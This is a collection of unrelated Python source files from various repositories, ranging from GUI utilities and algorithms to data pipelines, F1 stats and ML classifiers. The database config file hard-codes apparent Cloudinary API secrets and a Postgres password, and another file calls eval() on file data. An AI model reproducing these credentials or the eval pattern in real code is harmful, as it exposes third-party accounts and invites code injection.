| epic-kitchens/epic-kitchens-55-action-models | model_loader.py | model_loader.py | py | 2,906 | python | en | code | 73 | github-code | 36 |
14893965980 | #coding: utf-8
import sys,io
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import QIcon
class Main(QWidget):
    """Small window: a line edit and a button that writes the entered text,
    slash-separated per character, to textfile.txt."""

    def __init__(self):
        super().__init__()
        self.mainUI()

    def mainUI(self):
        """Build the widgets, lay them out vertically and show the window."""
        self.setGeometry(300, 300, 300, 300)
        self.setWindowTitle('文字区切り君')
        self.lineEdit = QLineEdit(self)
        self.button = QPushButton('区切る!', self)
        self.button.clicked.connect(self.buttonClicked)
        # layout
        self.vbox = QVBoxLayout()
        self.vbox.addWidget(self.lineEdit)
        self.vbox.addWidget(self.button)
        self.setLayout(self.vbox)
        self.show()

    def buttonClicked(self):
        """Join the entered characters with '/' and save to textfile.txt.

        BUG FIX: the original guard ended in `pass`, so it skipped nothing;
        we now return early when the field is empty.  The file is written
        through a context manager with an explicit encoding instead of a
        bare open/write/close sequence.
        """
        contents = str(self.lineEdit.text())
        if not contents:
            return
        with open('textfile.txt', 'w', encoding='utf-8') as f:
            f.write('/'.join(contents))
if __name__ == '__main__':
    # BUG FIX: the stdout re-wrapping sat after sys.exit(), where it could
    # never run; set up the UTF-8 stdout wrapper before starting the app.
    sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
    app = QApplication(sys.argv)
    gui = Main()
    sys.exit(app.exec_())
| hirotask/-Python-mojiretu_kugiru | 文字列区切る君/main.py | main.py | py | 1,205 | python | en | code | 1 | github-code | 36 |
16127941604 | # -*- coding: utf-8 -*-
# @Project :MyProject
# @File :create_particle
# @Date :2021/7/20 13:23
# @Author :Concon
# @Email :kangkang.liu@raykite.com
# @Software :PyCharm
import copy
import random
from my_api.demo.data_base import DataBase
class Generation3DData(DataBase):
    """Generate fake 3D map points (id + lat/lng) for demo endpoints."""

    def __init__(self):
        super().__init__()
        # per-item template; deep-copied so each item gets its own coordinate dict
        self.data = {
            "id": None,
            "coordinate": {}
        }

    def particle(self, num):
        """Append *num* random points to page_data and return it.

        NOTE(review): items accumulate in self.page_data across calls (the
        list is never reset here) — confirm that is the intended behaviour.
        """
        for n in range(num):
            data = copy.deepcopy(self.data)
            data["id"] = n
            # random Beijing-area coordinates from the DataBase helper
            data["coordinate"]["lat"], data["coordinate"]["lng"] = self.generation_lat_lng_bj()
            self.page_data["data"].append(data)
        self.page_data["total"] = num
        return self.page_data

    def hot_chart(self, num):
        """Like particle(), but each point also carries a random count string."""
        for n in range(num):
            data = copy.deepcopy(self.data)
            data["id"] = n
            data["count"] = str(random.randint(1, 1000))
            data["coordinate"]["lat"], data["coordinate"]["lng"] = self.generation_lat_lng_bj()
            self.page_data["data"].append(data)
        self.page_data["total"] = num
        return self.page_data
if __name__ == '__main__':
    gen = Generation3DData()
    print(gen.hot_chart(30))

import json

# NOTE(review): everything below runs at import time (it sits outside the
# __main__ guard) and reads a hard-coded Desktop path — confirm intended.
with open(r"C:\Users\RAYDATA\Desktop\test.json", "r") as f:
    data = f.read()
# SECURITY NOTE: eval() executes arbitrary code from the file; since the
# file is .json, json.loads (or ast.literal_eval) would be the safe choice.
for item in eval(data):
    item["count"] = int(item["count"])
    print(item)
| Meetky/RTestData | my_api/demo/create_3d_data.py | create_3d_data.py | py | 1,670 | python | en | code | 0 | github-code | 36 |
class Solution:
    """Gas-station circuit problem: two greedy solutions.

    Given gas available at each station (A) and the cost to reach the next
    station (B), find the unique start index from which a full circuit is
    possible, or -1 if none exists.
    """

    def canCompleteCircuit1(self, A, B):
        """Greedy variant with an up-front feasibility check.

        BUG FIX: the original accumulated `idx += i + 1`, which returns a
        wrong index whenever the tank goes negative more than once; when a
        failure occurs at station i, the candidate start must be SET to
        i + 1 (as canCompleteCircuit below already did).
        """
        if sum(A) < sum(B):
            return -1
        remaining_fuel = 0
        idx = 0
        for i in range(len(A)):
            remaining_fuel += A[i] - B[i]
            if remaining_fuel < 0:
                # no start in [idx, i] can work; restart just past i
                idx = i + 1
                remaining_fuel = 0
        return idx

    def canCompleteCircuit(self, A, B):
        """Single-pass variant that also tracks the total surplus."""
        if sum(A) < sum(B):
            return -1
        idx = 0
        total_cost = 0
        rem_fuel = 0
        for i in range(len(A)):
            diff = A[i] - B[i]
            total_cost += diff
            rem_fuel += diff
            if rem_fuel < 0:
                idx = i + 1
                rem_fuel = 0
        return -1 if total_cost < 0 else idx
# Quick sanity check: from station 1 the tank never goes negative, so 1 prints.
A = [1, 2, 4]
B = [2, 1, 3]
print(Solution().canCompleteCircuit(A,B))
477002440 | import unittest
from .change_constraint import ChangeConstraint
from ..definitions.constraint import Constraint
class ChangeConstraintTest(unittest.TestCase):
    """Checks the SQL rendered when a foreign-key constraint is changed."""
    def test_as_string(self):
        constraint = Constraint('user_id_fk', 'user_id', 'users', 'id', on_update='cascade')
        # assertEquals is a deprecated alias that was removed in Python 3.12;
        # assertEqual is the supported spelling.
        self.assertEqual(
            "DROP FOREIGN KEY `user_id_fk`, ADD CONSTRAINT `user_id_fk` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE RESTRICT ON UPDATE CASCADE",
            str(ChangeConstraint(constraint))
        )
| cmancone/mygrations | mygrations/core/operations/change_constraint_test.py | change_constraint_test.py | py | 526 | python | en | code | 10 | github-code | 36 |
26192939759 | import os
import png
import math
from color_helpers import convert_16_bit_texture_for_pypng
# IO THPS Scene Image Correction
def shift_row_pixels(row_pixels, shift_amount):
    """Rotate a flat RGBA row right by `shift_amount` pixels (4 values each).

    A negative amount rotates left; 0 returns a fresh copy.
    """
    split = -4 * shift_amount
    # Equivalent to moving the last `shift_amount` pixels to the front.
    return [*row_pixels[split:], *row_pixels[:split]]
def shift_image_rows(image_data, shift_amount):
    """Rotate the rows of `image_data` downward by `shift_amount` positions.

    Returns a new outer list; the row lists themselves are shared, matching
    the original one-step-at-a-time rotation.
    """
    rows = list(image_data)
    for _ in range(shift_amount):
        # Move the bottom row to the top, one step per iteration.
        rows = [rows[-1], *rows[:-1]]
    return rows
def shift_image_column(image_data, col_index, shift_amount, image_height):
    """Rotate one 4-channel (RGBA) column of `image_data` vertically by
    `shift_amount` pixels and return a rebuilt image (rows are fresh lists)."""
    start = col_index * 4
    # Flatten the column's RGBA values top-to-bottom.
    stacked = []
    for r in range(image_height):
        stacked.extend(image_data[r][start:start + 4])
    # Rotate by whole pixels; same slicing convention as shift_row_pixels.
    split = -4 * shift_amount
    rotated = [*stacked[split:], *stacked[:split]]
    # Splice the rotated pixels back into each row.
    result = []
    for r in range(image_height):
        row = list(image_data[r][:start])
        row.extend(rotated[r * 4:r * 4 + 4])
        row.extend(image_data[r][start + 4:])
        result.append(row)
    return result
def fix_pixel_data(width, height, pixels):
    """Correct an IO THPS scene texture: mirror each row horizontally, shift
    the image right by one pixel, down by one row, then move the first column
    up by one pixel."""
    mirrored = []
    for row in range(height):
        flat = []
        # Walk the row's pixel tuples in reverse order to mirror it.
        for idx in reversed(range(row * width, (row + 1) * width)):
            flat.extend(pixels[idx])
        mirrored.append(shift_row_pixels(flat, 1))
    shifted_down = shift_image_rows(mirrored, 1)
    return shift_image_column(shifted_down, 0, -1, height)
# End IO THPS Scene Image Correction
def write_image(output_path, width, height, final_image):
    """Write `final_image` (RGBA rows) to `output_path` as a PNG, creating any
    missing parent directories first."""
    os.makedirs(os.path.dirname(output_path), exist_ok=True)
    # Context manager guarantees the handle is closed even if writing fails;
    # the original leaked the handle on any png.Writer error.
    with open(output_path, "wb") as output_file:
        writer = png.Writer(width, height, greyscale=False, alpha=True)
        writer.write(output_file, final_image)
def write_to_png(filename, output_dir, create_sub_dirs, pvr, pixels):
    """Decode one PVR texture to a PNG named <stem>_<header_offset>.png.

    16-bit palettes (pal_size == 65536) are converted via the 16-bit helper;
    everything else goes through fix_pixel_data().
    """
    # Bug fix: os.path.splitext keeps interior dots ("a.b.png" -> "a.b");
    # the old "".join(filename.split(".")[0:-1]) collapsed them to "ab".
    filename_without_extension = os.path.splitext(filename)[0]
    if create_sub_dirs:
        output_dir = os.path.join(output_dir, filename_without_extension)
    output_path = os.path.join(output_dir, f"{filename_without_extension}_{pvr.header_offset:#0{8}x}.png")
    if pvr.pal_size != 65536:
        write_image(output_path, pvr.width, pvr.height, fix_pixel_data(pvr.width, pvr.height, pixels))
    else:
        write_image(output_path, pvr.width, pvr.height, convert_16_bit_texture_for_pypng(pvr.pixel_format, pvr.width, pixels))
| slfx77/psx_texture_extractor | helpers.py | helpers.py | py | 2,778 | python | en | code | 11 | github-code | 36 |
34443847573 | names = []
option = ""
def dropoff():
    """Ask for a child's name and add it to the roll."""
    # .title() after .upper() yields normal capitalisation ("ann lee" -> "Ann Lee").
    child = input("What is the name of your child? ").upper().title()
    names.append(child)
def pickup():
    """Ask for a child's name and check them out if they are on the roll."""
    child = input("What is the name of your child? ").upper().title()
    if child not in names:
        print("error")
        return
    print(child, "has been picked up")
    names.remove(child)
def calc_cost():
    """Ask how many hours the child stays and print the total cost."""
    price_per_hour = 12
    try:
        hours = int(input("How many hours is your child going to stay for? "
                          "(please enter in numbers) "))
    except ValueError:
        # Robustness fix: a non-numeric answer used to crash the whole program.
        print("Please enter a whole number of hours")
        return
    print("$", hours * price_per_hour)
def print_roll():
    """Print the names of all children currently checked in."""
    print(names)
# Main menu loop; ends when the user picks option 5.
while option != "5":
    option = input("========================\n"
                   "Welcome to MGS Childcare.\n"
                   "What would you like to do?\n"
                   "1. Drop off a child\n"
                   "2. Pick up a child\n"
                   "3. Calculate cost\n"
                   "4. Print roll\n"
                   "5. Exit the system\n"
                   "Enter an option from 1 to 5: ")
    if option == "1":
        dropoff()
    elif option == "2":
        pickup()
    elif option == "3":
        calc_cost()
    elif option == "4":
        print_roll()
    elif option == "5":
        # The loop condition ends the program; no explicit exit() needed.
        print("Goodbye")
    else:
        # Bug fix: any unrecognised input (e.g. "9") used to print Goodbye
        # and silently exit the program.
        print("Invalid option, please enter a number from 1 to 5")
| yis1234/Projects | childcare.py | childcare.py | py | 1,250 | python | en | code | 0 | github-code | 36 |
28912411327 | """
ler maior numero digitado e quantas vezes foi digitado o maior numero
"""
# Variable declarations
qtd_maior = 0        # how many times the current maximum was typed
atual_maior = None   # largest value seen so far
qtd = int(input("Quantidade de repetições: "))  # user input: number of values
for index in range(qtd):
    valor = int(input(f"Valor({index + 1}): "))  # user input
    if atual_maior is None or valor > atual_maior:
        # Bug fix: on a new maximum the counter must restart at 1; the
        # original kept incrementing for every valor >= atual_maior, so the
        # reported repetition count included entries of *previous* maxima.
        atual_maior = valor
        qtd_maior = 1
    elif valor == atual_maior:
        qtd_maior += 1
# Report the maximum and how many times it was entered
print(f"Valor maior digitado: {atual_maior} e foi digitado o maior valor {qtd_maior}x.")
| BrunoDias312/CursoPython | Curso/Atividade Curso/Secao 06/Questao18.py | Questao18.py | py | 750 | python | pt | code | 0 | github-code | 36 |
23013394729 | import requests
import os
def gokidsgo():
    """Ask for a URL (defaulting to the local Apache icon), GET it, and print
    either the response body or the HTTP status code.

    Consistency fix: the two original branches duplicated the whole
    request/print logic; only the URL selection differs now.
    """
    answer = input('Url? default: 127.0.0.1/').rstrip()
    if answer == '':
        url = 'http://127.0.0.1/icons/folder.gif'
        print('grabbing: ' + url)
    else:
        url = answer
    req = requests.get(url, timeout=90)
    if req.ok:
        print(req.text)
    else:
        print('error: ')
        print(str(req.status_code))
def main():
    """Prompt once and dispatch: 'exit' quits, 'go' or an empty answer fetches."""
    answer = input('ready, type go, or type exit').rstrip()
    if 'exit' in answer:
        print('quitting')
        quit()
    if 'go' in answer:
        gokidsgo()
    if answer == '':
        gokidsgo()
# Bug fix: main() used to be called unconditionally here as well, so the
# prompt ran twice when the file was executed (and once on mere import).
if __name__ == "__main__":
    main()
40176740668 | # Compute column.
# input is the input text string
# token is a token instance
def find_column(input, token):
    """Return the 1-based column of `token` within `input`.

    Bug fix: rfind() returns -1 when the token sits on the first line; the
    old code clamped that to 0 and added 1, which shifted every column on
    lines *after* the first by one.  Treating -1 as "the position just
    before index 0" keeps all lines consistently 1-based (this is the
    standard PLY recipe: lexpos - line_start + 1, with line_start = rfind + 1).
    """
    last_cr = input.rfind('\n', 0, token.lexpos)
    return token.lexpos - last_cr
24814387482 | #! /usr/bin/env python
from __future__ import print_function
from pyspark import SparkContext, SparkConf
from pyspark.sql import SparkSession
import Addressbook_pb2
import sys
from google.protobuf import json_format
import json
import glob
import errno
if __name__ == "__main__":
    # Spark -> MinIO (S3-compatible) connection settings; the credentials are
    # for a local dev MinIO instance.
    confz = SparkConf()\
        .set("spark.hadoop.fs.s3a.endpoint","http://127.0.0.1:9000")\
        .set("spark.hadoop.fs.s3a.access.key","minio")\
        .set("spark.hadoop.fs.s3a.secret.key","minio123")\
        .set("spark.hadoop.fs.s3a.path.style.access","true")\
        .set("spark.hadoop.fs.s3a.impl","org.apache.hadoop.fs.s3a.S3AFileSystem")
    spark = SparkSession.builder.master("local[3]").appName("Test4").config(conf=confz).getOrCreate()
    # Read the JSON records from S3 and re-materialise them as local part files.
    ndf = spark.read.option("multiline","false").format("json").load("s3a://spark-test/jsontest")
    ndf.write.mode("overwrite").format("json").save("/home/yy/fod/jsonfile")
    address_book = Addressbook_pb2.AddressBook()
    json_dict = {}
    # Merge every part file Spark produced into one dict.
    # NOTE(review): dict.update() overwrites duplicate keys across part files
    # -- confirm the records are keyed uniquely.
    files = glob.glob("/home/yy/fod/jsonfile/*.json")
    for name in files:
        try:
            with open(name) as f:
                json_dict.update(json.load(f))
        except IOError as exc:
            # EISDIR means glob matched a directory: skip it, re-raise the rest.
            if exc.errno != errno.EISDIR:
                raise
    # Convert the merged JSON into an AddressBook protobuf and write its
    # serialised form to the path given as the first CLI argument.
    address_book = json_format.ParseDict(json_dict, Addressbook_pb2.AddressBook())
    with open(sys.argv[1], "wb") as f:
        f.write(address_book.SerializeToString())
| yiyuan906/ProjectWork | ProtobufTest/SparkConvertFrom.py | SparkConvertFrom.py | py | 1,367 | python | en | code | 0 | github-code | 36 |
43710529105 | from hashlib import sha1
class Signature() :
    """Builds and checks SHA-1 request signatures using a shared secret.

    NOTE(review): this is Python 2 code -- under Python 3, hashlib.sha1()
    requires bytes, so every concatenated string fed to sha1() would need
    to be encoded first.
    """
    def __init__(self,secret):
        self.secret = secret
    def validate(self,request):
        """Recompute the token from the fields listed in signature.signed and
        compare it to the supplied token."""
        keys = request['signature']['signed'].split(',')
        signing_string = ''
        for key in keys :
            # NOTE(review): uses the raw value, while generate() applies
            # str() -- non-string values would sign differently. Confirm.
            signing_string += request[key]
        token = sha1(signing_string + request['signature']['nonce'] + self.secret).hexdigest()
        return token == request['signature']['token']
    def generate(self,request,nonce):
        """Sign every key of `request` (in dict iteration order!) and attach
        the signature block in place; returns the same dict."""
        signed = []
        signing_string = ""
        for key in request :
            signed.append(key)
            signing_string += str(request[key])
        # Nonce and secret are appended last, matching validate()'s layout.
        signing_string += nonce + self.secret
        request["signature"] ={
            "signed":",".join(signed),
            "token": sha1(signing_string ).hexdigest(),
            "nonce" : nonce}
        return request
| gouravnema/signature | python/Signature.py | Signature.py | py | 888 | python | en | code | 0 | github-code | 36 |
4275879545 | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import cloudinary
# SECURITY: real-looking Cloudinary and Postgres credentials are committed
# here -- move them to environment variables / a secrets store and rotate them.
cloudinary.config(
    cloud_name="djtxsnk9c",
    api_key="372171617535646",
    api_secret="2zMo8MA5wgslqPtRwHOVS1AFRks",
)
# SQLALCHEMY_DATABASE_URL = "sqlite:///./sql_app.db"
# NOTE(review): the "postgres://" scheme is rejected by SQLAlchemy >= 1.4
# (which expects "postgresql://") -- confirm the pinned SQLAlchemy version.
SQLALCHEMY_DATABASE_URL = "postgres://dmgshbpnrymmwi:262dd54c1af68404d1ad96bfc7d61323703e56f967432b51931a3f6a6643ed4d@ec2-34-206-8-52.compute-1.amazonaws.com:5432/d6bnjatookfchk"
# "postgresql://fastapi_user:fastapi@localhost/fastapi_db"
engine = create_engine(
    SQLALCHEMY_DATABASE_URL,  # connect_args={"check_same_thread": False}
)
# Session factory and declarative base shared by the app's ORM models.
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
| ddicko/deploy_fastapi | sql_app/database.py | database.py | py | 775 | python | en | code | 0 | github-code | 36 |
15672169459 | from datetime import datetime
import logging
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('discord').setLevel(logging.INFO)
dt_fmt = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(format='[{asctime}] [{levelname:<8}] [{name:<15}]: {message}',
style='{',
datefmt='%Y-%m-%d %H:%M:%S')
dt_format_o = "%Y %Y-%m-%d %H:%M:%S"
import fastf1 as ff1
import os
import drivers
import requests
try:
    ff1.Cache.enable_cache("/ff1cache")
except NotADirectoryError:
    # Bug fix: after creating the missing directory the cache was never
    # actually enabled, so every run silently went uncached.  Create the
    # directory, then retry.
    os.makedirs("/ff1cache", exist_ok=True)
    ff1.Cache.enable_cache("/ff1cache")
# Shared lookup/caching object built once at import time.
drivers_table = drivers.drivers_table()
# The ten 2023 constructors; used by verifyTeam().
teams = ["Red Bull", "Ferrari", "Mercedes", "McLaren", "Alpine", "Alfa Romeo", "AlphaTauri", "Haas", "Aston Martin",
         "Williams"]
# Hard-coded 2023 race start datetimes, one per round in calendar order;
# returnCurrentRoundNum() scans this list.
# NOTE(review): these are naive datetimes -- confirm they match the host
# machine's local clock / timezone.
schedule = [datetime(2023, 3, 4, 20, 29),
            datetime(2023, 3, 18, 22, 29),
            datetime(2023, 4, 1, 10, 29),
            datetime(2023, 4, 29, 18, 59),
            datetime(2023, 5, 7, 1, 29),
            datetime(2023, 5, 27, 19, 29),
            datetime(2023, 6, 3, 19, 29),
            datetime(2023, 6, 18, 1, 29),
            datetime(2023, 7, 1, 19, 59),
            datetime(2023, 7, 8, 19, 29),
            datetime(2023, 7, 22, 19, 29),
            datetime(2023, 7, 29, 19, 59),
            datetime(2023, 8, 26, 18, 29),
            datetime(2023, 9, 2, 19, 29),
            datetime(2023, 9, 16, 18, 29),
            datetime(2023, 9, 23, 11, 29),
            datetime(2023, 10, 7, 19, 59),
            datetime(2023, 10, 22, 3, 29),
            datetime(2023, 10, 29, 2, 29),
            datetime(2023, 11, 3, 23, 59),
            datetime(2023, 11, 18, 13, 29),
            datetime(2023, 11, 25, 19, 29)]
def returnNextEvent():
    """Summarise the next remaining event of the season as a dict.

    Session entries are read pairwise (name, date) from columns 7..12 of the
    fastf1 schedule row.
    """
    upcoming = ff1.get_events_remaining().head(1)
    round_no = upcoming.iat[0, 0]
    location = upcoming.iat[0, 1]
    if location == 'United States':
        location = 'USA'
    sessions = {}
    for offset in range(0, 5, 2):
        sessions[upcoming.iat[0, 7 + offset]] = upcoming.iat[0, 7 + offset + 1]
    return {'round': round_no,
            'loc': location,
            'date': upcoming.iat[0, 4],
            'name': upcoming.iat[0, 5],
            'type': upcoming.iat[0, 6],
            'session': sessions
            }
def returnCurrentRoundNum():
    """Return the 1-based index of the first schedule entry still in the future.

    Falls back to 24 once the season is over (NOTE(review): the schedule list
    holds 22 rounds -- confirm 24 is the intended sentinel).
    """
    for position, race_start in enumerate(schedule, start=1):
        if datetime.now() < race_start:
            return position
    return 24
def returnEvent(identifier):
    """Look up one event of the current season by round number or name and
    return its summary dict; past rounds also carry cached race results."""
    event = ff1.get_event(datetime.now().year, identifier)
    round_no = event.iat[0]
    summary = {
        'round': round_no,
        'loc': event.iat[1],
        'date': event.iat[4],
        'name': event.iat[5],
        'type': event.iat[6],
    }
    cached = drivers_table.results.get(str(round_no))
    if round_no < returnCurrentRoundNum() and cached is not None:
        summary['results'] = cached
    return summary
def returnRoundsInYear(year=None):
    """Return the number of rounds in `year`'s calendar (testing excluded).

    Bug fix: the old default `year=datetime.now().year` was evaluated once at
    import time, so a long-running process kept querying the stale year after
    a New Year boundary.  The default is now resolved at call time.
    """
    if year is None:
        year = datetime.now().year
    cal = ff1.events.get_event_schedule(year=year, include_testing=False).tail(1)
    return cal.iat[0, 0]
def returnGPQuali(pgp):
    """Return the qualifying (or sprint) classification for round `pgp` as a
    list of driver codes, caching the result in drivers_table.

    Returns None when the Ergast API has no data yet.
    """
    cached = drivers_table.quali_results.get(str(pgp))
    if cached is not None:
        return cached
    keyword = "sprint" if returnEvent(pgp)["type"] == "sprint" else "qualifying"
    url = f"https://ergast.com/api/f1/{datetime.now().year}/{pgp}/{keyword}.json"
    races = requests.get(url).json()["MRData"]["RaceTable"]["Races"]
    if not races:
        return None
    # NOTE(review): the "QualifyingResults" key is read for sprints too --
    # confirm against the Ergast sprint payload.
    codes = [entry["Driver"]["code"] for entry in races[0]["QualifyingResults"]]
    drivers_table.quali_results[str(pgp)] = codes
    return codes
def returnRaceResults(r):
    """Return the finishing order (driver codes) for round `r`, caching it in
    drivers_table; None when the Ergast API has no data yet."""
    cached = drivers_table.results.get(str(r))
    if cached is not None:
        return cached
    url = f"https://ergast.com/api/f1/{datetime.now().year}/{r}/results.json"
    races = requests.get(url).json()["MRData"]["RaceTable"]["Races"]
    if not races:
        return None
    codes = [entry["Driver"]["code"] for entry in races[0]["Results"]]
    drivers_table.results[str(r)] = codes
    return codes
def verifyTeam(t):
    """Return `t` when it is a recognised team name, otherwise the string 'NaN'."""
    if t in teams:
        return t
    return 'NaN'
# print(returnCurrentRoundNum())
| nERD8932/LVSF1Bot | scripts/f1module.py | f1module.py | py | 4,985 | python | en | code | 1 | github-code | 36 |
70853975785 | # -*- coding: utf-8 -*-
from __future__ import print_function
from nltk.stem.porter import PorterStemmer
from textblob import TextBlob
from wordcloud import WordCloud
import nltk
import json
import matplotlib.pyplot as plt
import os
import string
from textblob.sentiments import NaiveBayesAnalyzer
ps = PorterStemmer()
tweetDict = {}
def main(name,location):
    """Load tweets from tweet_stream_<name>[_<location>].json, clean them,
    write a plain-text corpus, and return (avg p_pos, avg p_neg) sentiment.

    NOTE(review): Python 2 only -- dict.iteritems() and str-based
    string.maketrans are used below.
    """
    directory = "Corpus Data"
    count = 0
    if location == "":
        filename = 'tweet_stream_{}.json'.format(name)
        fileCorpus = 'tweet_stream_{}.txt'.format(name)
    else:
        filename = 'tweet_stream_{}_{}.json'.format(name,location)
        fileCorpus = 'tweet_stream_{}_{}.txt'.format(name,location)
    print(filename)
    #Read dataset containing tweets
    with open(filename) as json_file:
        tweets = json.load(json_file)
    # NOTE(review): the corpus file is opened before the existence check /
    # makedirs below, so a missing "Corpus Data" dir fails here -- confirm.
    with open(directory + '/' + fileCorpus, 'w') as f:
        for tweet in tweets:
            # tweet[1] is the text; tweet[0] is presumably a date -- confirm
            # against the producer of the JSON file.
            #Removal of special characters
            encoded_tweet=tweet[1].encode('utf-8')
            unicode_text = encoded_tweet.decode('unicode_escape').encode('ascii','ignore')
            # Replace every punctuation character with a space.
            punct=string.punctuation
            table_p=string.maketrans(punct,len(punct)*" ")
            text=unicode_text.translate(table_p)
            tweetDict[count] = [tweet[0],text]
            if not os.path.exists(directory):
                os.makedirs(directory)
            f.write(tweet[1].encode('utf-8'))
            f.write('\n')
            count += 1
    sub = []
    pol = []
    cnt = 1
    for key,value in tweetDict.iteritems():
        #if value[0].strip() == dateVal.strip():
        #Call to removal_stop_words
        text_without_stopwords = remove_stop_words(value[1])
        #TextBlob using NaiveBayes
        text = TextBlob(text_without_stopwords,analyzer = NaiveBayesAnalyzer())
        # p_pos / p_neg are the NaiveBayesAnalyzer class probabilities.
        pol.append(text.sentiment.p_pos)
        sub.append(text.sentiment.p_neg)
        print(cnt)
        cnt += 1
        #TextBlob without NaiveBayes
        # text = TextBlob(value[1])
        # pol.append(text.sentiment.polarity)
        # sub.append(text.sentiment.subjectivity)
    word_cloud()
    resultPolarity = sum(pol)/len(pol)
    resultSubjectivity = sum(sub)/len(sub)
    print(resultPolarity,resultSubjectivity)
    return resultPolarity,resultSubjectivity
#Removal of stopwords
def remove_stop_words(text):
    """Drop English stopwords from `text` and Porter-stem the surviving words,
    returning them space-joined (with the original leading-space quirk kept)."""
    stop_words = set(nltk.corpus.stopwords.words('english'))
    kept = ' '
    for word in text.lower().split():
        if word not in stop_words:
            kept += ' ' + ps.stem(word)
    return kept
#Word Cloud
def word_cloud():
    """Render two word clouds (default and capped font size) from all cleaned
    tweets accumulated in the module-level tweetDict; blocks on plt.show()."""
    keywords_list = ''
    # Python 2 iteration; value[1] holds the cleaned tweet text.
    for key,value in tweetDict.iteritems():
        keyword = remove_stop_words(value[1])
        keywords_list += ' ' + keyword
    wordcloud = WordCloud().generate(keywords_list)
    plt.imshow(wordcloud)
    plt.axis("off")
    # Second rendering with a capped maximum font size.
    wordcloud = WordCloud(max_font_size=40).generate(keywords_list)
    plt.figure()
    plt.imshow(wordcloud)
    plt.axis("off")
    plt.show()
| dhanashriOstwal/electionSentimentAnalysis | Python Scripts/sentimentAnalysis.py | sentimentAnalysis.py | py | 3,158 | python | en | code | 0 | github-code | 36 |
22355103302 | # coding: utf-8
import os
import random
import time
import cv2
import numpy as np
import torch
from torch import nn, optim
from tqdm import tqdm
import matplotlib.pyplot as plt
import modules
class Classifier:
chinese_characters = ['云', '京', '冀', '吉', '宁', '川', '新', '晋', '桂', '沪',
'津', '浙', '渝', '湘', '琼', '甘', '皖', '粤', '苏', '蒙',
'藏', '豫', '贵', '赣', '辽', '鄂', '闽', '陕', '青', '鲁',
'黑']
other_characters = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K',
'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
'W', 'X', 'Y', 'Z']
def __init__(self, load_path=None, dataset_path=None, train_proportion=0.8, save_path=None, is_chinese=True):
if torch.cuda.is_available():
torch.set_default_tensor_type('torch.cuda.FloatTensor')
if load_path:
self.cnn = torch.load(load_path)
elif is_chinese:
self.cnn = modules.MyCNN(len(self.chinese_characters))
else:
self.cnn = modules.MyCNN(len(self.other_characters))
self.characters = self.chinese_characters if is_chinese else self.other_characters
self.character_dict = dict([(c, i) for i, c in enumerate(self.characters)])
self.train_images, self.train_labels = ([], []) if not dataset_path else self.read_dataset(dataset_path)
self.eval_images, self.eval_labels = ([], [])
self.train_proportion = train_proportion
self.save_path = save_path
def predict(self, images, batch_size=8, to_character=True):
"""
Predict labels.
"""
images = np.array(images, )
pred_labels = []
self.cnn.eval()
for start in range(0, len(images), batch_size):
outputs = self.cnn(torch.tensor(images[start:start + batch_size], dtype=torch.float32))
pred_labels += outputs.softmax(1).argmax(1).tolist()
return [self.characters[idx] for idx in pred_labels] if to_character else pred_labels
def train(self, num_epochs, train_batch_size=8, method='adam', lr=0.01, momentum=0, do_eval=True,
eval_batch_size=8):
"""
Train, and evaluate if specified.
"""
assert train_batch_size > 0 and eval_batch_size > 0
optimizer = self.get_optimizer(method=method, lr=lr, momentum=momentum)
train_accuracy_list = []
eval_accuracy_list = []
for epoch in range(num_epochs):
self.shuffle_dataset()
# Train
print('-' * 20 + 'Training epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
num_correct = 0
for start in tqdm(range(0, len(self.train_images), train_batch_size), desc='Training batch: '):
images = self.train_images[start:start + train_batch_size]
actual_labels = self.train_labels[start:start + train_batch_size]
# Forward
images = torch.tensor(np.array(images), dtype=torch.float32)
outputs = self.cnn(images)
# Backward
batch_labels = torch.tensor(actual_labels, dtype=torch.int64)
self.cnn.zero_grad()
loss = nn.CrossEntropyLoss()(outputs, batch_labels)
loss.backward()
optimizer.step()
# Calculate metrics
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.train_images)
print('Accuracy:', acc)
train_accuracy_list.append(acc)
self.save_cnn(str(epoch) + '.pth')
# Evaluate
if not do_eval:
continue
num_correct = 0
print('-' * 20 + 'Evaluating epoch %d' % epoch + '-' * 20, flush=True)
time.sleep(0.1)
for start in tqdm(range(0, len(self.eval_images), eval_batch_size), desc='Evaluating batch: '):
images = self.eval_images[start:start + eval_batch_size]
actual_labels = self.eval_labels[start:start + eval_batch_size]
# Forward
images = torch.tensor(images, dtype=torch.float32)
outputs = self.cnn(images)
# Get results
pred_labels = outputs.softmax(1).argmax(1).tolist()
num_correct += np.equal(pred_labels, actual_labels).sum()
acc = num_correct / len(self.eval_images)
print('Accuracy:', acc)
eval_accuracy_list.append(acc)
plt.plot(train_accuracy_list)
plt.plot(eval_accuracy_list)
plt.legend(['train', 'eval'])
plt.show()
def get_optimizer(self, method='adam', lr=0.01, momentum=0):
if method == 'sgd':
return optim.SGD(self.cnn.parameters(), lr=lr, momentum=momentum)
elif method == 'adam':
return optim.Adam(self.cnn.parameters(), lr=lr)
else:
return None
def shuffle_dataset(self):
images = self.train_images + self.eval_images
labels = self.train_labels + self.eval_labels
seed = time.time()
random.seed(seed)
random.shuffle(images)
random.seed(seed)
random.shuffle(labels)
split_index = int(self.train_proportion * len(images))
self.train_images, self.train_labels = images[:split_index], labels[:split_index]
self.eval_images, self.eval_labels = images[split_index:], labels[split_index:]
def save_cnn(self, name):
if not self.save_path:
return None
elif not os.path.exists(self.save_path):
os.makedirs(self.save_path)
torch.save(self.cnn, os.path.join(self.save_path, name))
def read_dataset(self, path):
print('-' * 20 + 'Reading data' + '-' * 20, flush=True)
images, labels = [], []
for character in tqdm(self.characters):
current_dir = os.path.join(path, character)
for file_name in os.listdir(current_dir):
file_path = os.path.join(current_dir, file_name)
